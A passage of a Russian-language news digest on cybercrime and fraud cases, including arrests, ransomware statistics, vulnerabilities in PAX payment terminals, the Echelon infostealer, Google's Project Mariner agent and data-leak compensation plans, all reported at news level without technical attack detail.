Проведен 21 обыск по местам проживания фигурантов и изъяты мобильные телефоны, компьютерная техника, принтеры, ламинаторы, банковские карты, SIM-карты, 22 пластиковые карты поддельных водительских удостоверений, несколько десятков пластиковых заготовок для подделки водительских удостоверений, более 280 бланков заведения по подготовке водителей, печати и клише с оттиском узора для голограмм.
Правоохранители направили в суд обвинительный акт в отношении шести членов группировки по ч. 3 ст. 199, ч. 3 ст. 28 ч. 3 ст. 358 Уголовного кодекса Украины. Злоумышленникам грозит до двенадцати лет лишения свободы.
Главным управлением цифрового развития Следственного комитета завершено расследование уголовного дела в отношении двух иностранцев, которые осуществляли на территории Беларуси предпринимательскую деятельность, связанную с продажей криптовалюты.
Весной 2019 года 36-летний иностранец – руководитель одного из крупнейших финансовых сервисов по обмену токенов на территории России, Армении, Узбекистана, Казахстана, Украины, Грузии и Обьединенных Арабских Эмиратов, организовал осуществление предпринимательской деятельности по продаже указанных активов на территории нашего государства.
До начала деятельности бизнесмен изучил законодательство, регулирующее вопросы обращения криптовалюты в Республике Беларусь. Им же запрашивались сведения из государственных органов о порядке реализации токенов и электронных денег, а также проводились консультации с квалифицированными юристами, которые разъяснили ему ответственность за нарушение налогового законодательства и посоветовали не заниматься вышеуказанным.
Приняв соответствующее решение, бизнесмен привлек к систематической продаже цифровых активов своего 38-летнего приятеля – тоже иностранца.
Продажа осуществлялась в арендованном в Минске офисном помещении. Сделки обеспечивались посредством использования интернет-сайтов, зарегистрированных вне юрисдикции Республики Беларусь, на которых размещалась информация о предлагаемых услугах.
Клиентами выступали физические лица, заинтересованные в покупке криптовалюты, которые соблюдали специально разработанные для них алгоритмы. В частности, от клиентов обменника требовалось заблаговременно сообщить информацию о времени посещения ими офисного помещения, размере и наименовании цифровой валюты, которую они желали приобрести. Также они должны были пройти верификацию в соответствующем Telegram-чате, посредством которого с ними осуществлялась переписка.
В процессе расследования удалось установить, что в нарушение положений Декрета Президента Республики Беларусь №8 «О развитии цифровой экономики» к данной предпринимательской деятельности были привлечены введенные в заблуждение относительно правомерности своих действий физические лица, которыми осуществлялся учёт и систематизация сведений о клиентах обвиняемых.
В целях сокрытия налоговой базы и неуплаты подоходного налога обвиняемыми использовались различные средства анонимизации, в том числе учетные записи, зарегистрированные в мессенджере Telegram, посредством которых велась переписка с клиентами.
В ходе осуществления указанной деятельности компаньоны выстроили особую линию поведения на случай обнаружения правоохранительными органами уклонения ими от уплаты налогов. Длительное время они не привлекали к себе внимания со стороны правоохранительных органов и оставались незамеченными, однако в марте 2023 года их деятельность была пресечена сотрудниками Комитета государственного контроля Республики Беларусь.
При проведении первоначальных следственных действий изъята и детально изучена компьютерная техника, иные носители информации фигурантов уголовного дела, в результате чего получены доказательства, свидетельствующие о проведении в период с декабря 2019 года по январь 2023 года более 2 тысяч сделок по продаже цифровой валюты. Ежедневная сумма варьировалась от одной тысячи до 100 тысяч долларов США. Комиссия зависела от проводимой сделки: 1 - 5 %.
В результате систематической продажи цифровой валюты обвиняемыми получены в указанный период доходы на сумму, превышающую 10 миллионов белорусских рублей.
Действия фигурантов уголовного дела квалифицированы по части 3 статьи 243 (уклонение от уплаты налогов в особо крупном размере) Уголовного кодекса Республики Беларусь.
Свою вину в совершении преступления обвиняемые признали в полном объеме, дали подробные показания по существу предъявленных им обвинений. Ущерб, причиненный преступлением, составил более 1,1 миллиона белорусских рублей и в результате принятых по уголовному делу мер он возмещен в полном объеме.
Уголовное дело передано прокурору для направления в суд.
Следственный комитет напоминает, что предпринимательская деятельность по систематической продаже токенов на территории Республики Беларусь, осуществляемая физическими лицами в нарушение положений Декрета Президента Республики Беларусь №8 «О развитии цифровой экономики», является незаконной и запрещается.
• Source: sk.gov.by/ru/news-ru/view/presechena-dejatelnost-krupnogo-tenevogo- obmennika-kriptovaljuty-prestupnyj-doxod-bolee-10-millionov-rublej-13341/
• Video: https://t.me/skgovby/10511
В Оренбуржье завершено расследование уголовного дела в отношении ОПГ, занимавшейся незаконной банковской деятельностью. Об этом сообщили в региональном УМВД.
Преступление было раскрыто зимой 2022 года. Предварительное следствие велось 18 месяцев. Материалы уголовного дела составили 92 тома.
Оперативники задержали 48-летнего мужчину и шесть жителей Оренбурга из числа его близких, которые также незаконно обналичивали деньги.
Выяснилось, что фигуранты создали сеть подставных юридических лиц и ИП. Находили клиентов для своих «услуг», подготавливали фиктивные документы и отчеты.
Всего через банковские счета прошли порядка 200 юридических лиц. Прибыль составила 145 млн рублей. Часть из этой суммы злоумышленники легализовали путем банковских переводов и покупки имущества на сумму более 17,5 млн рублей.
Имущество участников ОПГ на сумму более 150 млн рублей арестовали.
Уголовное дело передано в суд. Во время следствия два фигуранта находились под домашним арестом, еще четверо – под подпиской о невыезде.
Чешская полиция сообщила, что в Праге задержаны десять иностранных студентов. Их подозревают в организации группы, причастной к отмыванию денег, полученных от махинаций в интернете: вероятно, они обманом убеждали людей присылать им деньги.
Выдавая себя за «хирурга из миссии ООН в Йемене, американского солдата в Афганистане или специалиста, работающего на нефтяной платформе», мошенники обманывали чешских женщин, у которых в соцсетях было указано, что они не замужем или разведены.
Студенты вступали с ними в переписку, делились трогательными историями из далеких регионов и предлагали женщинам встретиться, уверяя, что у них есть деньги, просто к ним сейчас нет доступа.
Жертвы часто поддавались и переводили мошенникам деньги, чтобы те могли к ним приехать.
По данным чешских следователей, группа получила от доверчивых и отзывчивых женщин порядка 68 тысяч долларов.
В конце октября 2022 года в Управление финансового анализа сообщили о возможной нелегальной деятельности. В ходе расследования мошенников разоблачили. Как выяснилось, часть денег они тратили в Чехии, а часть переводили на банковские счета в других странах.
Получив деньги, студенты пытались скрыть происхождение средств, поэтому найти и отследить их было непросто, как сказали в полиции.
Если студентов признают виновными, по чешским законам им грозит лишение свободы на срок от двух до восьми лет.
• Source: https://www.policie.cz/docDetail.aspx?docid=22799588&docType=ART
Выкуп не вернет данные, а только привлечет других киберпреступников.
Национальный центр кибербезопасности Великобритании (NCSC) и Управление уполномоченного по информации (ICO), регулирующее защиту данных, призвали юристов предостеречь своих клиентов от уплаты выкупа вымогателям. Согласно совместному письму, выплата выкупа не обеспечит безопасность данных и не смягчит последствия.
В своем письме NCSC и ICO напомнили об увеличении количества вымогательских атак и выплаченных сумм выкупа. «Юридические консультанты часто нанимаются для консультирования клиентов, ставших жертвами программ-вымогателей. Юристы подсказывают жертвам как правильно реагировать и нужно ли платить выкуп. Сохраняется убеждение, что выплата выкупа может защитить украденные данные и привести к меньшему штрафу со стороны ICO. Мы хотели бы прояснить, что это не так».
Платеж не гарантирует возврат украденных данных и не уменьшает вероятность последующей атаки. «Закон Великобритании о защите данных требует от организаций принятия соответствующих технических и организационных мер для обеспечения безопасности личной информации и восстановления данных в случае киберинцидента».
ICO не считает выкуп злоумышленникам снижением риска, и это не уменьшит штрафы ICO». Однако, ICO ожидает уменьшение риска, поскольку организации анализируют ситуацию и извлекают уроки из кибератак, сообщая о инциденте правоохранительные органы.
По заявлению генерального директора NCSC Линди Кэмерон, юридический сектор должен сыграть ключевую роль в изменении тенденций выплат вымогателям. «Вымогатели остаются самой большой угрозой для Великобритании, и мы не приветствуем выплату выкупа злоумышленникам. Кибербезопасность — это коллективная работа, мы призываем юридический сектор сотрудничать с нами, поскольку мы продолжаем наши усилия по борьбе с программами-вымогателями и обеспечению безопасности Великобритании в Интернете», - сказала Кэмерон.
Уполномоченный по информации Великобритании Джон Эдвардс добавил, что взаимодействие с киберпреступниками и выплата выкупа только побудит других хакеров к проведению атаки.
«За последние 5 лет киберпреступления обошлись британским фирмам в миллиарды долларов. Ответом на это должны быть бдительность, хорошая кибергигиена, в том числе создание резервных копий и обучение персонала для выявления и предотвращения атак. Организации получат больше пользы от этих действий, чем откупившись от вымогателей»
Click to expand...
заявил Эдвардс.
source: ncsc.gov.uk/files/Joint-ICO-and-NCSC-letter-to-The-Law-Society-and-The-Bar-Council-V1.pdf | ncsc.gov.uk/news/solicitors-urged-to-help-stem-the-rising-tide-of-ransomware-payments
Как сообщают в Департаменте Киберполиции, сотрудники подразделения в Одесской области раскрыли противозаконную деятельность преступной группировки, от действий которой пострадали два украинских банка, названия которых не раскрывают.
Шестеро мужчин, в возрасте от 36 до 46 лет занимались подделкой документов, удостоверяющих личность, а в дальнейшем – использовали их, чтобы подавать заявки на оформление быстрых кредитов, через интернет-сайты банков.
В случае, если внесенная мошенниками недостоверная информация успешно проходила проверку банком и получала одобрение, преступники получали ссуду на карту, после чего обналичивали деньги и тратили их по собственному усмотрению. Согласно предварительной оценке правоохранителей, полученной в ходе досудебного расследования, таким способом мошенникам удалось получить более 1 миллиона гривен.
В качестве «доноров» для поддельных документов, по которым мошенники подают заявки, выступают купленные или украденные через интернет фотокопии реальных документов граждан Украины, которые несложно приобрести на тематических хакерских форумах или телеграм-каналах.
При помощи компьютерных средств обработки изображений, преступники размещают на чужих документах свои изображения и данные, в следствие чего они пробиваются по официальным базам и, в результате не слишком придирчивой проверки, получают одобрение кредитора.
Подобная схема мошенничества не является редкостью, однако, в большинстве случаев, действуют одиночки, а причиняемый ими ущерб – на порядок, а то и два порядка меньше. К примеру, наиболее крупная нашумевшая афера была раскрыта в августе текущего года, когда мошенница из Кривого Рога оформила по поддельным документам 40 онлайн-кредитов на сумму 300 тысяч гривен.
Как сообщают в Киберполиции, шестерым фигурантам объявлено о подозрении в совершении преступлений по ч. 4 ст. 190 (мошенничество), ч. 4 ст. 358 (подделка документов, печатей, штампов и бланков, сбыт или использование поддельных документов, печатей, штампов) Уголовного кодекса Украины. Обвинительный акт направлен в суд, где мошенникам грозит до двенадцати лет лишения свободы с конфискацией имущества.
Пункты полиции будут оснащены системами спутниковой связи и идентификации преступников, а также возможностью подключения к системе «Безопасный город».
В России могут появиться умные участковые пункты полиции, включающие
спутниковые системы и системы распознания преступников. Об этом сообщил
начальник Главного управления по обеспечению охраны общественного порядка и
координации взаимодействия с органами исполнительной власти субъектов РФ МВД
России Михаил Давыдов.
«Умный» участковый пункт будет обеспечен современной компьютерной техникой и
средствами связи, в том числе спутниковой в случае отдаленных населенных
пунктов. Кроме того, там будут доступны удаленное подключение к системе
«Безопасный город» и система опознания правонарушителей с помощью системы
удаленного доступа и видеонаблюдения.
Михаил Давыдов отмечает, что, несмотря на техническую прогрессивность таких
пунктов полиции, они пока что не могут заменить участкового, так как для
полиции крайне важная персональная работа с населением. Поэтому, предлагает
начальник Главного управления по обеспечению охраны общественного порядка,
необходимо продолжать работу над повышением профессиональных навыков
полицейских.
Источник : https://www.securitylab.ru/news/523937.php
President Biden signed an executive order Wednesday to modernize the country's defenses against cyberattacks and give more timely access to information necessary for law enforcement to conduct investigations.
This executive order follows the numerous cyberattacks targeting US interests
this year, including the SolarWinds supply chain attacks in December and the
more recent DarkSide ransomware attack against the largest US fuel pipeline,
Colonial Pipeline.
The 34-page '[Executive Order on Improving the Nation's
Cybersecurity](http://www.whitehouse.gov/briefing-room/presidential-
actions/2021/05/12/executive-order-on-improving-the-nations-cybersecurity/)'
is designed to modernize the cybersecurity defenses of the federal
government's infrastructure, created a standardized incident response
playbook, and increase communication between service providers and law
enforcement.
In summary, the executive order will direct the government to perform the
following actions:
These initiatives will be conducting in rolling phrases ranging between 30 days from the executive order, to in some cases, 360 days.
"This is one of the most detailed and deadline-driven EOs I’ve seen from any administration. In the wake of a seismic attack, like SolarWinds, this is incredibly encouraging to see," Amit Yoran, CEO of Tenable and founding director of US-CERT, shared in a statement to bleepingcomputer[.]
The White House has also released a [summarized version of the executive order](https://www.whitehouse.gov/briefing-room/statements- releases/2021/05/12/fact-sheet-president-signs-executive-order-charting-new- course-to-improve-the-nations-cybersecurity-and-protect-federal-government- networks/) that provides a good overview of the upcoming changes being made to increase the country's cybersecurity posture.
Поставщик антивирусных решений, компания Emsisoft сообщает, что неизвестная третья сторона получила доступ к базе данных, содержащей технические логи.
Проблема заключалась в том, что тестовая система оказалась неверно сконфигурирована и доступна через интернет, а вместе с ней упомянутая БД. Эта система использовалась для оценки и сравнительного анализа хранения и управления данными логов, которые генерируют продукты и сервисы Emsisoft. Из- за ошибки сотрудников, БД стала доступна для всех желающих 18 января 2021 года, а утечку обнаружили и устранили только 3 февраля 2021 года.
Сообщается, что конфиденциальной информации в базе было немного: 14 адресов электронной почты, принадлежащие семи различным организациям. Однако БД хранила множество продакшен-логов, а расследование показало, что по меньшей мере один человек «получил доступ к некоторым или всем данным, содержащимся в этой базе данных».
«Украденные данные состоят из технических логов, создаваемых нашим защитным ПО в ходе обычной работы, например, протоколов обновления. Обычно [такие логи] не содержат никакой личной информации, включая пароли, хэши паролей, имена учетных записей пользователей, информацию для выставления счетов, адреса и так далее», — уверяют в компании.
Click to expand...
Вышеупомянутые 14 адресов электронной почты, которые хранились в базе данных, попали туда через логи сканеров, так как в почтовых клиентах пользователей были обнаружены вредоносные электронные письма.
Источник: xakep.ru/2021/02/11/emsisoft-leak/
Сотрудник корейского Woori Bank арестован за мошенничество с кредитными документами, хищение $15 млн и использование украденных средств для инвестиций в криптовалюты.
Сотрудник отдела корпоративного кредитования Woori Bank с июля 2023 по май 2024 года 35 раз сфальсифицировал кредитные документы, рассказывает полиция. Мошеннические кредиты были выданы на имя 17 клиентов, среди которых значились частные лица и компании. Украденные средства сотрудник банка вложил в криптовалюты. Полиция не уточняет, в какие именно.
Прокуратура заморозила активы нарушителя на сумму около $3,2 млн, включая депозиты на криптовалютных биржах, банках и кредитных компаниях.
Следователи полагают, что мошенническим действиям способствовало неадекватное управление бизнес-процессами в банке. Сотрудники могли одобрить срочные кредиты в отсутствие уполномоченного лица, а штаб-квартира банка направляла заемные средства непосредственно в филиалы, а не на счет заемщика, утверждает полиция.
Несколько лет назад в Китае произошла похожая история. Служащий китайского банка украл принадлежащие организации 1.85 млн юаней, которые затем вложил в биткоины. Однако с трейдингом нарушителю не повезло — вложенные средства он потерял на падении курса первой криптовалюты.
Сразу 6 уязвимостей в оборудовании PAX дают злоумышленникам полный карт-бланш на мошенничество.
Группа исследователей из польской компании STM Cyber обнаружила серьёзные уязвимости в платёжных терминалах, производимых китайской компанией PAX. С их помощью киберпреступники могут выполнять на PoS-терминалах произвольный код.
Специалисты использовали реверс-инжиниринг, чтобы исследовать безопасность устройств на базе Android, в связи с их стремительным распространением по территории Польши. В ходе этого процесса они выявили целых шесть критических недостатков, которые далее мы рассмотрим чуть подробнее.
Информация об одной из уязвимостей ( CVE-2023-42133 ) пока не раскрывается в целях предосторожности. Остальные же представляют из себя следующее:
CVE-2023-42134 и CVE-2023-42135 (CVSS 7.6) — локальное выполнение кода с правами root через инъекцию параметров ядра в fastboot (затрагивает PAX A920Pro/PAX A50).
CVE-2023-42136 (CVSS 8.8) — повышение привилегий от любого пользователя/приложения до системного пользователя с помощью службы binder (затрагивает все устройства PAX PoS на базе Android).
CVE-2023-42137 (CVSS 8.8) — повышение привилегий от системного пользователя до root с помощью небезопасных операций в демоне systool_server (затрагивает все устройства PAX PoS на базе Android).
CVE-2023-4818 (CVSS 7.3) — понижение версии загрузчика из-за неправильной токенизации (затрагивает PAX A920).
Успешное использование этих уязвимостей позволяет злоумышленникам повысить свои привилегии до уровня root и обойти защиту песочницы, фактически получая неограниченный доступ к выполнению любых операций.Click to expand...
Перечень злонамеренный действий включает в себя вмешательство в платёжные операции для «изменения данных, которые торговое приложение отправляет в защищённый процессор, включая сумму транзакции», — отметили исследователи безопасности Адам Клиш и Хуберт Ясудович.
Стоит отметить, что для эксплуатации CVE-2023-42136 и CVE-2023-42137 злоумышленнику необходим доступ к оболочке устройства, в то время как для остальных трёх требуется физический доступ к USB-порту устройства.
Исследователи STM Cyber раскрыли уязвимости компании PAX Technology в начале мая 2023 года, а в ноябре последняя выпустила исправления, устраняющие эти недостатки безопасности.
sc: blog.stmcyber.com/pax-pos-cves-2023/
Специализированным следственным отделом по расследованию преступлений, совершенных с использованием информационно-телекоммуникационных технологий, СУ Управления МВД России по г. Самаре окончено расследование уголовного дела, возбужденного в отношении мужчины 1996 года рождения, который обвиняется в неправомерном доступе к компьютерной информации и краже денежных средств с банковского счета.
В ходе предварительного следствия установлено, что обвиняемый в сентябре 2021 года прибыл на территорию Самарской области и арендовал квартиру в Самарском районе областного центра. Не позднее октября того же года он незаконно приобрел базу данных абонентов одной из телекоммуникационных компаний. Используя полученную информацию, с помощью логина и пароля, он незаконно получал доступ к личному кабинету пользователя связи. Следователи совместно с сотрудниками УФСБ России по Самарской области установили, что после этого мужчина изменял сведения о формате используемой абонентом сим-карты с пластиковой на виртуальную. Формирование новой электронной сим-карты занимало меньше трех минут. В двух случаях ему удалось с помощью банковских приложений получить доступ к счетам граждан и перевести денежные средства на электронный кошелек либо приобрести товары в интернет-магазинах.
Жертвами преступных действий стали жители 15 регионов, в том числе Брянской, Волгоградской, Ленинградской, Московской и Самарской областей. Всего пострадали 27 человек в возрасте от 27 до 67 лет, у двоих из них похищены денежные средства на общую сумму более 210 000 рублей.
Ранее судимому мужчине предъявлено обвинение в совершении преступлений, предусмотренных ч. 2 ст. 272 УК РФ «Неправомерный доступ к компьютерной информации» (27 эпизодов) и п. «г» ч. 3 ст. 158 УК РФ «Кража с банковского счёта» (2 эпизода). На данный момент уголовные дела соединены в одно производство и с утвержденным обвинительным заключением направлены в суд для рассмотрения по существу.
В начале прошлого месяца в код Firefox, отвечающий за всплывающие подсказки ссылки, были внесены изменения с целью устранения бага, известного с 2002 года. Фикс включен в сборку 119 браузера, выпуск которой намечен на 24 октября.
Проблему, которой был присвоен ID 148624, зарегистрировал в Bugzilla пользователь Juneappal (Adam Price), владелец macOS-компьютера с установленным браузером Mozilla. Прайсу надоели tooltip-подсказки, появлявшиеся при наведении курсора на закладку и подвисавшие при переходе в окно другого приложения.

Избавиться от них можно было, лишь сдвинув курсор и вернувшись в браузер. Впоследствии этот же баг пытались зарегистрировать и другие пользователи Firefox; иногда он проявлялся также на Windows- и Linux-платформах.
Поскольку фантомные подсказки не нарушали работу Firefox, а только вызывали раздражение, решение проблемы каждый раз откладывалось. Когда с ней столкнулся 23-летний выпускник Стэнфорда И Фань Чжу (Yifan Zhu), оказалось, что они почти ровесники.
Молодой человек был заинтригован и решил попробовать исправить ситуацию, благо лето и впереди куча свободного времени. Программированию Чжу был обучен, но никогда не имел дело с такими сложными проектами, как Firefox.
Первый блин оказался комом, хотя новичку-энтузиасту помогли детализировать патч и оформить коммит. Вторая попытка, тоже с посторонним участием, оказалась более удачной. Предложение Чжу было принято, соответствующие исправления внесены в код Firefox 119, который сейчас проходит бета-тестирование.
В соцсетях по этому поводу появились восторженные отзывы. Некоторые начали отпускать шутки вроде «а Bugzilla-то постарше бага будет, ей в августе стукнуло 25» и «фикс отнял добычу у ботов, собравшихся удалить неисправленный баг за давностью». Один комментатор описал жизненный путь борца за чистоту кода следующим образом:
[](https://www.anti- malware.ru/files/image2ff_tooltips_bug.png)
source: arstechnica.com/gadgets/2023/10/22-year-old-firefox-tooltip-bug-fixed- in-a-few-lines-offering-hope-to-us-all
Национальная полиция Испании провела при поддержке Европейского полицейского агентства (Европол) 29 расследований, которые частично были профинансированы из Фонда внутренней безопасности Совета Европы. Об этом говорится в пресс- релизе правоохранительных органов королевства.
По их информации, в ходе операций были задержаны 197 человек за незаконный оборот наркотиков, отмывание денег, незаконное хранение оружия и другие преступления. Среди арестованных фигурируют граждане более 30 государств, в том числе России и Украины.
В ходе проведенных операций было изъято в общей сложности почти 5 тонн кокаина, а также другие наркотики. Кроме того, полицейские конфисковали 28 единиц огнестрельного оружия и более €4,2 млн наличными. Стражи порядка наложили арест на 57 транспортных средств и различное имущество общей стоимостью около €12 млн.
source: policia.es/_es/comunicacion_prensa_detalle.php?ID=15898
Результаты ежегодных исследований связанных с ransomware угроз представили Sophos и IBM X-Force. Забегая вперед, отметим: выводы подтвердили все наши прогнозы.
Согласно исследования Sophos State of Ransomware 2022, средний размер выкупа за восстановление данных по сравнению с 2020 вырос в 5 раз и составил 812 360 долларов, при этом число компаний, выплативших более 1 миллиона долларов утроилось. В большинстве случаев (37%) сумма выкупа варьируется в диапазоне от 100 до 249 тысяч долларов.
По статистике, 7 из 10 компаний становились мишенью ransomware. Количество атак возросло на 78%, для 63% встреча с вымогателями заканчивалась шифрованием, а 26% смогли оперативно купировать угрозу и обеспечить сохранность своих данных. При этом 46% пострадавших компаний выплатили выкуп даже вопреки наличию у них возможностей восстановить данные, в том числе с использованием резервных копий.
Сработала тактика двойного вымогательства, многие опасаются утечки украденной информации. На переговоры и уступки жертв подталкивают последствия атак ransomware. 55% пострадавших компаний заявили, что влияние инцидента на бизнес было критическим.
Время устранения последствий атак составило до недели в 36% случаях, до месяца
Однако как показывает практика, сделка с хакерами не оправдывает ожиданий. 24% из числа откупившихся смогли восстановить около половины своих данных и только 3% из них удалось вернуть весь объем. При этом 78% атакованных все равно обращаются к работе с резервной копией.
Как отмечают Sophos, восстановление данных при любом из сценариев не гарантирует безопасности без надлежащей перепроверки восстановленных данных и сети. Зачастую доступ к сетям остается и по возможности перепродается. Лишь 27% респондентов ожидали и готовились к возможным инцидентам в будущем.
Исследователи IBM X-Force отмечают, что продолжительность атак в 2021 году в среднем составляла 92,5 часа с момента первоначального доступа к сети до развертывания полезной нагрузки, ранее хакеры тратили в среднем 230 часов на завершение своей атаки, а в 2019 году — 1637,6 часа.
В условиях совершенствования механизмов реагировании на инциденты вымогатели вынуждены были действовать более оперативно и слажено, в том числе выстраивая более тесное сотрудничество между брокерами первоначального доступа.
Некоторые крупные банды и вовсе получили контроль над первоначальным вектором заражения, как в случае с Conti и TrickBot. При этом вредоносное ПО для взлома корпоративных сетей за считанные минуты реализует постэксплуатационные этапы атаки.
Инструментарии вымогателей существенных изменений не претерпел: Cobalt Strike обычно используется для интерактивных сеансов, RDP - для бокового перемещения, Mimikatz и LSASS - для учетных данных, а SMB, WMIC и Psexec - для развертывания полезных нагрузок на сетевых узлах.
По словам исследователей, эффективность обнаружения и реагирования на угрозы значительно повысилась, но все также далека от совершенства. Соответствующими решениями обладали 36% целевых организаций, ранее - лишь 8%. В 64% случаев вторжения в сеть атакованные организаций своевременно предупреждались, в 2019
Конечно, представленные данные хоть и вызывают недоумение, но вовсе не удивляют.
Как мы и предупреждали, вымогатели будут действовать более целенаправленно и агрессивно, ускоряя атаки, оттачивая процесс шифрования и стараясь максимализировать ущерб своих атак, а значит и прибыль.
• Source: [https://assets.sophos.com/X24WTUEQ/...9bxgj9/sophos-state-of- ransomware-2022-wp.pdf](https://assets.sophos.com/X24WTUEQ/at/4zpw59pnkpxxnhfhgj9bxgj9/sophos- state-of-ransomware-2022-wp.pdf)
Злоумышленники используют Telegram для распространения вредоносного инфостиллера Echelon, который крадет учетные данные криптокошельков и других учетных записей пользователей.
Исследователи из подразделения Division Seven компании SafeGuard Cyber [обнаружили](https://www.safeguardcyber.com/blog/echelon-malware-crypto- wallet-stealer-malware) образец Echelon, опубликованный в Telegram-канале, посвященном криптовалюте. Вредоносное ПО создано для на кражи учетных данных нескольких платформ обмена сообщениями и файлами, включая Discord, Microsoft Edge, FileZilla, OpenVPN, Microsoft Outlook и Telegram, а также ряда кошельков криптовалюты, включая AtomicWallet, BitcoinCore, ByteCoin, Exodus, Jaxx и Monero.
«Исходя из вредоносного ПО и способа его размещения, SafeGuard Cyber считает, что оно не было частью скоординированной кампании, а просто нацелено на новых или наивных пользователей канала», — пояснили эксперты. Злоумышленники использовали маркер Smokes Night для распространения Echelon на канале, однако неизвестно, насколько это было успешным.
По словам экспертов, пользователи канала, похоже, не заметили ничего подозрительного и не заинтересовались этим сообщением. Однако это не означает, что вредоносная программа не достигла устройств пользователей.
Злоумышленники загрузили Echelon на канал криптовалюты в файле формата .RAR с названием «present) .rar». Архив содержал три файла — безопасный текстовый документ с паролем «pass - 123.txt», библиотеку классов и набор инструментов «DotNetZip.dll» для работы с файлами .ZIP и вредоносный исполняемый файл «Present.exe».
Полезная нагрузка, написанная на языке программирования .NET, также включала несколько функций, затрудняющих обнаружение или анализ. Функции защиты от отладки немедленно завершали процесс, если обнаруживался отладчик или другие инструменты анализа вредоносных программ. Также присутствовал инструмент с открытым исходным кодом для обфускации ConfuserEx.
К другим функциям вредоносного ПО относятся отслеживание цифровых отпечатков пальцев, а также возможность сделать снимок экрана на компьютерной системе жертвы. Echelon отправляет украденные данные и снимки экрана обратно на командный сервер.
К счастью, Защитник Windows обнаруживает и удаляет образец вредоносного исполняемого файла Present.exe и предупреждает его как «#LowFI: HookwowLow», уменьшая любой потенциальный ущерб от Echelon для пользователей с установленным антивирусным программным обеспечением.
Службы безопасности Украины заблокировали в Киеве работу сети подпольных обменников. Дельцы ежемесячно незаконно конвертировали через запрещенные электронные валюты более $1 миллиона.
В ходе досудебного следствия установлено, что так называемые пункты обмена электронных валют в течение длительного срока использовались злоумышленниками для операций с криптовалютами и электронными деньгами. Банковские карты были оформлены на подставных лиц, а кошельки запрещенных электронных валют - на граждан РФ, паспортные данные которых были приобретены у "DarkNet". Клиентами дельцов были теневые коммерсанты, в частности в сфере игорного бизнеса и мошеннических колл-центров.
По данным СБ Украины, электронные средства использовались спецслужбами ряда стран для анонимизации оплат за противоправные действия в ущерб государственной безопасности Украины и финансирования заказных псевдопротестных акций.
Во время проведения обысков по адресам администрирования подпольных пунктов обмена в Соломенском, Голосеевском и Деснянском районах столицы правоохранители изъяли:
компьютерную технику и мобильные устройства, с которых осуществлялась поддержка клиентов, а также незаконные обменные операции с запрещенными российскими электронными валютами;
большое количество наличных на более 3 млн в гривневом эквиваленте.
Сейчас одному из организаторов указанной противоправной схемы следователи СБУ сообщили о подозрении по ст. 200 (незаконные действия с документами на перевод, платежными карточками и другими средствами доступа к банковским счетам, электронными деньгами, оборудованием для их изготовления) Уголовного кодекса Украины.
Продолжаются следственные действия для привлечения к ответственности других лиц, причастных к противоправной деятельности.
Мероприятия по разоблачению проводились под процессуальным руководством Киевской областной прокуратуры.
• Source: ssu.gov.ua/novyny/u-kyievi-sbu-zablokuvala-robotu-merezhi- pidpilnykh-obminnykiv-elektronnykh-valiut-shchomisiachnyi-obih- stanovyv-1-milion
Google [представила](https://blog.google/technology/google-deepmind/google- gemini-ai-update-december-2024/#project-mariner) новый прототип ИИ-агента Project Mariner, который может выполнять действия в интернете так же, как человек. Разработанный подразделением DeepMind и работающий на базе технологии Gemini, агент управляет браузером Chrome, перемещая курсор, нажимая кнопки и заполняя формы.
Изначально доступ к Project Mariner предоставляется небольшой группе тестировщиков. По словам представителей Google, компания исследует новые способы использования Gemini, включая чтение, суммирование и работу с сайтами. В Project Mariner видят изменение пользовательского опыта, где взаимодействие с сайтами заменяется использованием генеративного ИИ.
Концепция может повлиять на миллионы компаний, которые зависят от привлечения реальных пользователей через Google, от издателей до ритейлеров. На демонстрации агент успешно выполнил задачу по созданию корзины на сайте продуктового магазина. Однако процесс сопровождался заметной задержкой — около 5 секунд между движениями курсора. Иногда агент запрашивал уточнения, например, о количестве товаров.
Важной особенностью является то, что Project Mariner не выполняет оплату, не принимает cookies и не подписывает пользовательские соглашения, чтобы сохранить контроль за действиями в руках пользователя. Агент требует согласия на передачу данных, поскольку во время работы агент делает скриншоты экрана, отправляет их в облако для анализа, а затем получает инструкции для работы с веб-страницей.
Помимо покупок, агент может находить билеты, рецепты и другие ресурсы, но работает только в активной вкладке Chrome. Такой подход был выбран, чтобы пользователи могли наблюдать за действиями AI. Несмотря на это, представители Google не исключают, что в будущем взаимодействие с сайтами может стать менее персонализированным.
Несмотря на то, что агент взаимодействует с веб-страницами, это может снизить вовлеченность пользователей и, возможно, со временем устранить необходимость в посещении сайтов. Руководитель Google Labs отметил, что такие изменения потребуют адаптации как от пользователей, так и от владельцев сайтов.
Пока неизвестно, когда Project Mariner станет доступным для широкой аудитории, но внедрение технологии обещает серьезно повлиять на привычный интернет.
Пострадавшим от утечек конфиденциальных данных россиянам предложили платить до 5 тыс. руб. компенсации на одного человека. Предложение [высказал ](https://www.vedomosti.ru/finance/articles/2024/11/08/1073695-soyuz- strahovschikov-nazval-vozmozhnii-razmer-kompensatsii-postradavshim-ot-utechek- dannih)председатель рабочей группы Всероссийского союза страховщиков (ВСС) по страхованию информационных рисков Владимир Новиков во время выступления в Совфеде РФ. Он также предложил установить лимит страхового покрытия таких рисков от 5 млн до 1 млрд руб. в зависимости от объёма хранимых компанией персональных данных.
Более двух лет в РФ обсуждают законопроект об оборотных штрафах для технологических компаний, которые допустили утечки личных данных. Положение предусматривает штраф в размере от 0,1% до 3% выручки компании за год, но не менее 15 млн руб. и не более 500 млн руб. за повторную утечку.
Также на обсуждении находится вопрос организации фонда помощи пострадавшим от утечек. Минцифры предлагает использовать в качестве третьей стороны портал «Госуслуги» при распределении компенсации за подобные утечки, хотя размеры таких выплат в ведомстве пока не установили.
Проект ВСС предусматривает создание страхового продукта, который будет включать фиксированные суммы компенсации за ущерб от утечек личных данных. В будущем размеры таких выплат можно пересмотреть, заявил Новиков.
За основу для определения размера компенсации ВСС взял три категории персональных данных: простые, специальные и биометрические. Гарантированная выплата за утечку составит 1 тыс., 2 тыс. и 5 тыс. руб. в зависимости от типа данных.
При расчёте общей страховой суммы будут учитывать объём этих данных у каждой компании. Если оператор данных хранит до 1 тыс. записей, то совокупный лимит страхового покрытия составит 5 млн руб. Максимальная страховая сумма получится у компаний, которые агрегируют более 1 млн записей — 1 млрд руб.
Новиков рассказал о модели урегулирования страховых случаев. После того как Роскомнадзор зарегистрирует факт утечки, необходимо подтвердить данные каждого пострадавшего и проинформировать его об этом через госуслуги. Затем пострадавший сможет подать заявление на выплату компенсации. Подтверждением обращений может заняться Национальная страховая информационная система, которой доступны данные РКН, страховых компаний и физических лиц, продолжает Новиков. После проведения проверок выплаты компенсаций будут осуществлять в автоматическом режиме.
